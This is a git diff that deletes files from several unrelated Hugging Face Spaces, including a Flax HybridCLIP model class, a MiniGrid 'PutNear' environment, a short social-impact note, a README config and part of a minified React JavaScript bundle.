vision_model_output=vision_outputs, - ) - - -class FlaxHybridCLIP(FlaxPreTrainedModel): - config_class = HybridCLIPConfig - module_class = FlaxHybridCLIPModule - - def __init__( - self, - config: HybridCLIPConfig, - 
input_shape: Optional[Tuple] = None, - seed: int = 0, - dtype: jnp.dtype = jnp.float32, - **kwargs, - ): - if input_shape is None: - input_shape = ( - (1, 1), - ( - 1, - config.vision_config.image_size, - config.vision_config.image_size, - 3, - ), - ) - - module = self.module_class(config=config, dtype=dtype, **kwargs) - super().__init__( - config, module, input_shape=input_shape, seed=seed, dtype=dtype - ) - - def init_weights(self, rng: jax.random.PRNGKey, input_shape: Tuple) -> FrozenDict: - # init input tensor - input_ids = jnp.zeros(input_shape[0], dtype="i4") - position_ids = jnp.broadcast_to( - jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_shape[0] - ) - token_type_ids = jnp.ones_like(input_ids) - attention_mask = jnp.ones_like(input_ids) - - pixel_values = jax.random.normal(rng, input_shape[1]) - - params_rng, dropout_rng = jax.random.split(rng) - rngs = {"params": params_rng, "dropout": dropout_rng} - - return self.module.init( - rngs, input_ids, pixel_values, attention_mask, position_ids, token_type_ids - )["params"] - - def __call__( - self, - input_ids, - pixel_values, - attention_mask=None, - position_ids=None, - token_type_ids=None, - params: dict = None, - dropout_rng: jax.random.PRNGKey = None, - train: bool = False, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ): - output_attentions = ( - output_attentions - if output_attentions is not None - else self.config.output_attentions - ) - output_hidden_states = ( - output_hidden_states - if output_hidden_states is not None - else self.config.output_hidden_states - ) - return_dict = ( - return_dict if return_dict is not None else self.config.return_dict - ) - - if position_ids is None: - position_ids = jnp.broadcast_to( - jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape - ) - - if token_type_ids is None: - token_type_ids = jnp.zeros_like(input_ids) - - if attention_mask is None: - attention_mask = jnp.ones_like(input_ids) - - # Handle any PRNG if needed - rngs = {} - if dropout_rng is not None: - rngs["dropout"] = dropout_rng - - return self.module.apply( - {"params": params or self.params}, - jnp.array(input_ids, dtype="i4"), - jnp.array(pixel_values, dtype=jnp.float32), - jnp.array(attention_mask, dtype="i4"), - jnp.array(position_ids, dtype="i4"), - jnp.array(token_type_ids, dtype="i4"), - not train, - output_attentions, - output_hidden_states, - return_dict, - rngs=rngs, - ) - - def get_text_features( - self, - input_ids, - attention_mask=None, - position_ids=None, - token_type_ids=None, - dropout_rng: jax.random.PRNGKey = None, - train=False, - ): - r""" - Args: - input_ids (:obj:`numpy.ndarray` of shape :obj:`(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - Indices can be obtained using :class:`~transformers.PreTrainedTokenizer`. See - :meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` - for details. - `What are input IDs? <../glossary.html#input-ids>`__ - Returns: - text_features (:obj:`jax_xla.DeviceArray` of shape :obj:`(batch_size, output_dim`): The text embeddings - obtained by applying the projection layer to the pooled output of text model. 
- """ - if position_ids is None: - position_ids = jnp.broadcast_to( - jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape - ) - - if token_type_ids is None: - token_type_ids = jnp.zeros_like(input_ids) - - if attention_mask is None: - attention_mask = jnp.ones_like(input_ids) - - # Handle any PRNG if needed - rngs = {} - if dropout_rng is not None: - rngs["dropout"] = dropout_rng - - def _get_features( - module, - input_ids, - attention_mask, - position_ids, - token_type_ids, - deterministic, - ): - text_outputs = module.text_model( - input_ids=input_ids, - attention_mask=attention_mask, - position_ids=position_ids, - token_type_ids=token_type_ids, - deterministic=deterministic, - ) - pooled_output = text_outputs[1] - text_features = module.text_projection(pooled_output) - return text_features - - return self.module.apply( - {"params": self.params}, - jnp.array(input_ids, dtype="i4"), - jnp.array(attention_mask, dtype="i4"), - jnp.array(position_ids, dtype="i4"), - jnp.array(token_type_ids, dtype="i4"), - not train, - method=_get_features, - rngs=rngs, - ) - - def get_image_features( - self, pixel_values, dropout_rng: jax.random.PRNGKey = None, train=False - ): - r""" - Args: - pixel_values (:obj:`numpy.ndarray` of shape :obj:`(batch_size, num_channels, height, width)`): - Pixel values. Padding will be ignored by default should you provide it. Pixel values can be obtained - using :class:`~transformers.ImageFeatureExtractionMixin`. See - :meth:`transformers.ImageFeatureExtractionMixin.__call__` for details. - Returns: - image_features (:obj:`jax_xla.DeviceArray` of shape :obj:`(batch_size, output_dim`): The image embeddings - obtained by applying the projection layer to the pooled output of vision model. - """ - - # Handle any PRNG if needed - rngs = {} - if dropout_rng is not None: - rngs["dropout"] = dropout_rng - - def _get_features(module, pixel_values, deterministic): - vision_outputs = module.vision_model( - pixel_values=pixel_values, deterministic=deterministic - ) - pooled_output = vision_outputs[1] # pooled_output - image_features = module.visual_projection(pooled_output) - return image_features - - return self.module.apply( - {"params": self.params}, - jnp.array(pixel_values, dtype=jnp.float32), - not train, - method=_get_features, - rngs=rngs, - ) - - @classmethod - def from_text_vision_pretrained( - cls, - text_model_name_or_path: str = None, - vision_model_name_or_path: str = None, - *model_args, - **kwargs, - ) -> FlaxPreTrainedModel: - """ - Params: - text_model_name_or_path (:obj: `str`, `optional`): - Information necessary to initiate the text model. Can be either: - - A string, the `model id` of a pretrained model hosted inside a model repo on huggingface.co. - Valid model ids can be located at the root-level, like ``bert-base-uncased``, or namespaced under - a user or organization name, like ``dbmdz/bert-base-german-cased``. - - A path to a `directory` containing model weights saved using - :func:`~transformers.FlaxPreTrainedModel.save_pretrained`, e.g., ``./my_model_directory/``. - - A path or url to a `PyTorch checkpoint folder` (e.g, ``./pt_model``). In - this case, ``from_pt`` should be set to :obj:`True` and a configuration object should be provided - as ``config`` argument. This loading path is slower than converting the PyTorch checkpoint in - a Flax model using the provided conversion scripts and loading the Flax model afterwards. 
- vision_model_name_or_path (:obj: `str`, `optional`, defaults to `None`): - Information necessary to initiate the vision model. Can be either: - - A string, the `model id` of a pretrained model hosted inside a model repo on huggingface.co. - Valid model ids can be located at the root-level, like ``bert-base-uncased``, or namespaced under - a user or organization name, like ``dbmdz/bert-base-german-cased``. - - A path to a `directory` containing model weights saved using - :func:`~transformers.FlaxPreTrainedModel.save_pretrained`, e.g., ``./my_model_directory/``. - - A path or url to a `PyTorch checkpoint folder` (e.g, ``./pt_model``). In - this case, ``from_pt`` should be set to :obj:`True` and a configuration object should be provided - as ``config`` argument. This loading path is slower than converting the PyTorch checkpoint in - a Flax model using the provided conversion scripts and loading the Flax model afterwards. - model_args (remaining positional arguments, `optional`): - All remaning positional arguments will be passed to the underlying model's ``__init__`` method. - kwargs (remaining dictionary of keyword arguments, `optional`): - Can be used to update the configuration object (after it being loaded) and initiate the model (e.g., - :obj:`output_attentions=True`). - - To update the text configuration, use the prefix `text_` for each configuration parameter. - - To update the vision configuration, use the prefix `vision_` for each configuration parameter. - - To update the parent model configuration, do not use a prefix for each configuration parameter. - Behaves differently depending on whether a :obj:`config` is provided or automatically loaded. - Example:: - >>> from transformers import FlaxHybridCLIP - >>> # initialize a model from pretrained BERT and CLIP models. Note that the projection layers will be randomly initialized. 
- >>> # If using CLIP's vision model the vision projection layer will be initialized using pre-trained weights - >>> model = FlaxHybridCLIP.from_text_vision_pretrained('bert-base-uncased', 'openai/clip-vit-base-patch32') - >>> # saving model after fine-tuning - >>> model.save_pretrained("./bert-clip") - >>> # load fine-tuned model - >>> model = FlaxHybridCLIP.from_pretrained("./bert-clip") - """ - - kwargs_text = { - argument[len("text_") :]: value - for argument, value in kwargs.items() - if argument.startswith("text_") - } - - kwargs_vision = { - argument[len("vision_") :]: value - for argument, value in kwargs.items() - if argument.startswith("vision_") - } - - # remove text, vision kwargs from kwargs - for key in kwargs_text.keys(): - del kwargs["text_" + key] - for key in kwargs_vision.keys(): - del kwargs["vision_" + key] - - # Load and initialize the text and vision model - text_model = kwargs_text.pop("model", None) - if text_model is None: - assert ( - text_model_name_or_path is not None - ), "If `model` is not defined as an argument, a `text_model_name_or_path` has to be defined" - from transformers import FlaxAutoModel - - if "config" not in kwargs_text: - from transformers import AutoConfig - - text_config = AutoConfig.from_pretrained(text_model_name_or_path) - kwargs_text["config"] = text_config - - text_model = FlaxAutoModel.from_pretrained( - text_model_name_or_path, *model_args, **kwargs_text - ) - - vision_model = kwargs_vision.pop("model", None) - if vision_model is None: - assert ( - vision_model_name_or_path is not None - ), "If `model` is not defined as an argument, a `vision_model_name_or_path` has to be defined" - from transformers import FlaxAutoModel - - if "config" not in kwargs_vision: - from transformers import AutoConfig - - vision_config = AutoConfig.from_pretrained(vision_model_name_or_path) - kwargs_vision["config"] = vision_config - - vision_model = FlaxAutoModel.from_pretrained( - vision_model_name_or_path, *model_args, **kwargs_vision - ) - - # instantiate config with corresponding kwargs - dtype = kwargs.pop("dtype", jnp.float32) - config = HybridCLIPConfig.from_text_vision_configs( - text_model.config, vision_model.config, **kwargs - ) - - # init model - model = cls(config, *model_args, dtype=dtype, **kwargs) - - if vision_config.model_type == "clip": - model.params["vision_model"]["vision_model"] = vision_model.params[ - "vision_model" - ] - model.params["visual_projection"]["kernel"] = vision_model.params[ - "visual_projection" - ]["kernel"] - else: - model.params["vision_model"] = vision_model.params - - model.params["text_model"] = text_model.params - - return model diff --git a/spaces/flax-community/spanish-image-captioning/sections/social_impact.md b/spaces/flax-community/spanish-image-captioning/sections/social_impact.md deleted file mode 100644 index 3e2065b825c524f494af3f5fc5f99a4c7f043e45..0000000000000000000000000000000000000000 --- a/spaces/flax-community/spanish-image-captioning/sections/social_impact.md +++ /dev/null @@ -1,4 +0,0 @@ -## Social Impact -Being able to automatically describe the content of an image using properly formed sentences in any language is a challenging task, but it could have great impact by helping visually impaired people better understand their surroundings. - -Our initial plan was to work with a low-resource language only. However, the existing translations do not perform as well and we would have received poor labels and hence we did not pursue this further. 
\ No newline at end of file diff --git a/spaces/flowers-team/SocialAISchool/gym-minigrid/gym_minigrid/envs/putnear.py b/spaces/flowers-team/SocialAISchool/gym-minigrid/gym_minigrid/envs/putnear.py deleted file mode 100644 index 19ee1a534e2c805a7de3784d90ddecd8a9f2b2db..0000000000000000000000000000000000000000 --- a/spaces/flowers-team/SocialAISchool/gym-minigrid/gym_minigrid/envs/putnear.py +++ /dev/null @@ -1,126 +0,0 @@ -from gym_minigrid.minigrid import * -from gym_minigrid.register import register - -class PutNearEnv(MiniGridEnv): - """ - Environment in which the agent is instructed to place an object near - another object through a natural language string. - """ - - def __init__( - self, - size=6, - numObjs=2 - ): - self.numObjs = numObjs - - super().__init__( - grid_size=size, - max_steps=5*size, - # Set this to True for maximum speed - see_through_walls=True - ) - - def _gen_grid(self, width, height): - self.grid = Grid(width, height) - - # Generate the surrounding walls - self.grid.horz_wall(0, 0) - self.grid.horz_wall(0, height-1) - self.grid.vert_wall(0, 0) - self.grid.vert_wall(width-1, 0) - - # Types and colors of objects we can generate - types = ['key', 'ball', 'box'] - - objs = [] - objPos = [] - - def near_obj(env, p1): - for p2 in objPos: - dx = p1[0] - p2[0] - dy = p1[1] - p2[1] - if abs(dx) <= 1 and abs(dy) <= 1: - return True - return False - - # Until we have generated all the objects - while len(objs) < self.numObjs: - objType = self._rand_elem(types) - objColor = self._rand_elem(COLOR_NAMES) - - # If this object already exists, try again - if (objType, objColor) in objs: - continue - - if objType == 'key': - obj = Key(objColor) - elif objType == 'ball': - obj = Ball(objColor) - elif objType == 'box': - obj = Box(objColor) - - pos = self.place_obj(obj, reject_fn=near_obj) - - objs.append((objType, objColor)) - objPos.append(pos) - - # Randomize the agent start position and orientation - self.place_agent() - - # Choose a random object to be moved - objIdx = self._rand_int(0, len(objs)) - self.move_type, self.moveColor = objs[objIdx] - self.move_pos = objPos[objIdx] - - # Choose a target object (to put the first object next to) - while True: - targetIdx = self._rand_int(0, len(objs)) - if targetIdx != objIdx: - break - self.target_type, self.target_color = objs[targetIdx] - self.target_pos = objPos[targetIdx] - - self.mission = 'put the %s %s near the %s %s' % ( - self.moveColor, - self.move_type, - self.target_color, - self.target_type - ) - - def step(self, action): - preCarrying = self.carrying - - obs, reward, done, info = super().step(action) - - u, v = self.dir_vec - ox, oy = (self.agent_pos[0] + u, self.agent_pos[1] + v) - tx, ty = self.target_pos - - # If we picked up the wrong object, terminate the episode - if action == self.actions.pickup and self.carrying: - if self.carrying.type != self.move_type or self.carrying.color != self.moveColor: - done = True - - # If successfully dropping an object near the target - if action == self.actions.drop and preCarrying: - if self.grid.get(ox, oy) is preCarrying: - if abs(ox - tx) <= 1 and abs(oy - ty) <= 1: - reward = self._reward() - done = True - - return obs, reward, done, info - -class PutNear8x8N3(PutNearEnv): - def __init__(self): - super().__init__(size=8, numObjs=3) - -register( - id='MiniGrid-PutNear-6x6-N2-v0', - entry_point='gym_minigrid.envs:PutNearEnv' -) - -register( - id='MiniGrid-PutNear-8x8-N3-v0', - entry_point='gym_minigrid.envs:PutNear8x8N3' -) diff --git 
a/spaces/forklift-app/forklift-images/README.md b/spaces/forklift-app/forklift-images/README.md deleted file mode 100644 index cd02ce7ab375a51e447b4c73e71aa125ffb38caf..0000000000000000000000000000000000000000 --- a/spaces/forklift-app/forklift-images/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Forklift Images -emoji: 🐨 -colorFrom: gray -colorTo: gray -sdk: gradio -sdk_version: 3.14.0 -app_file: app.py -pinned: false ---- -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/furiosa-ai/ocr/static/js/main.87470711.js b/spaces/furiosa-ai/ocr/static/js/main.87470711.js deleted file mode 100644 index af5a0585199a4b7b97eb7420e1344772ac5653a3..0000000000000000000000000000000000000000 --- a/spaces/furiosa-ai/ocr/static/js/main.87470711.js +++ /dev/null @@ -1,3 +0,0 @@ -/*! For license information please see main.87470711.js.LICENSE.txt */ -!function(){var e={174:function(e,t,n){var r;e=n.nmd(e),function(o){var a=t,i=(e&&e.exports,"object"==typeof n.g&&n.g);i.global!==i&&i.window;var l=function(e){this.message=e};(l.prototype=new Error).name="InvalidCharacterError";var u=function(e){throw new l(e)},s="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",c=/[\t\n\f\r ]/g,f={encode:function(e){e=String(e),/[^\0-\xFF]/.test(e)&&u("The string to be encoded contains characters outside of the Latin1 range.");for(var t,n,r,o,a=e.length%3,i="",l=-1,c=e.length-a;++l>18&63)+s.charAt(o>>12&63)+s.charAt(o>>6&63)+s.charAt(63&o);return 2==a?(t=e.charCodeAt(l)<<8,n=e.charCodeAt(++l),i+=s.charAt((o=t+n)>>10)+s.charAt(o>>4&63)+s.charAt(o<<2&63)+"="):1==a&&(o=e.charCodeAt(l),i+=s.charAt(o>>2)+s.charAt(o<<4&63)+"=="),i},decode:function(e){var t=(e=String(e).replace(c,"")).length;t%4==0&&(t=(e=e.replace(/==?$/,"")).length),(t%4==1||/[^+a-zA-Z0-9/]/.test(e))&&u("Invalid character: the string to be decoded is not correctly encoded.");for(var n,r,o=0,a="",i=-1;++i>(-2*o&6)));return a},version:"1.0.0"};void 0===(r=function(){return f}.call(t,n,t,e))||(e.exports=r)}()},110:function(e,t,n){"use strict";var r=n(309),o={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},a={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},i={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},l={};function u(e){return r.isMemo(e)?i:l[e.$$typeof]||o}l[r.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},l[r.Memo]=i;var s=Object.defineProperty,c=Object.getOwnPropertyNames,f=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDescriptor,p=Object.getPrototypeOf,h=Object.prototype;e.exports=function e(t,n,r){if("string"!==typeof n){if(h){var o=p(n);o&&o!==h&&e(t,o,r)}var i=c(n);f&&(i=i.concat(f(n)));for(var l=u(t),v=u(n),m=0;m